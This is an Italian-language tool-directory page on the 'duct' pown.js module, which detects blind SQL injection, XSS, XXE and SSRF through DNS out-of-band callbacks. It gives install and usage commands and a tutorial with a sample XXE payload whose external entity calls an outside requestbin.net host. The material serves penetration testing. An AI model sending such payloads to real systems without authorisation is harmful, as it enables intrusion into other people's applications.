Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
duct — Strumento essenziale per trovare attacchi di blind injection. | Kitploit
Strumenti/GitHubGitHub/pownjs/duct
Sfruttamento di Applicazioni WebRaccolta InformazioniAnalisi DNS
GitHubpownjs/duct

duct

Strumento essenziale per trovare attacchi di blind injection.

Vedi Repository
49137 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Follow on Twitter NPM Fury

Pown Duct

Strumento essenziale per individuare attacchi di injection ciechi utilizzando canali laterali DNS.

Crediti

Questo strumento fa parte dell'iniziativa open source di secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Questo strumento sfrutta il servizio http://requestbin.net. Le versioni future utilizzeranno un'infrastruttura dedicata e costruita su misura.

Avvio rapido

Questo strumento è pensato per essere utilizzato come parte di Pown.js ma può essere invocato separatamente come strumento indipendente.

Installa prima Pown come al solito:

root@kitploit:~
$ npm install -g pown@latest

Invoca direttamente da Pown:

root@kitploit:~
$ pown duct

Altrimenti, installa questo modulo localmente dalla radice del tuo progetto:

root@kitploit:~
$ npm install @pown/duct --save

Una volta fatto, invoca pown cli:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

Puoi anche usare pown globale per invocare lo strumento localmente:

root@kitploit:~
$ POWN_ROOT=. pown duct

Utilizzo

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

Ci sono casi in cui dobbiamo eseguire un attacco come SQL injection, XSS, XXE o SSRF ma l'applicazione target non fornisce alcuna indicazione di essere vulnerabile. Un modo per essere sicuri se una vulnerabilità è presente è provare a iniettare un vettore di attacco valido che costringe un resolver DNS a chiedere un dominio controllato. Se la risoluzione ha successo, l'attacco sarà considerato riuscito.

NOTA: Potresti avere familiarità con Burp Collaborator che fornisce un servizio simile per i clienti.

Prima, abbiamo bisogno di un nome DNS usa e getta da risolvere:

root@kitploit:~
$ pown duct dns

screenshot

Usando il DNS fornito, componi il tuo payload. Ad esempio, il seguente potrebbe innescare una risoluzione DNS se è presente una vulnerabilità XXE.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Se l'attacco ha successo, riceveremo un messaggio nel terminale.

screenshot

Scarica lo strumento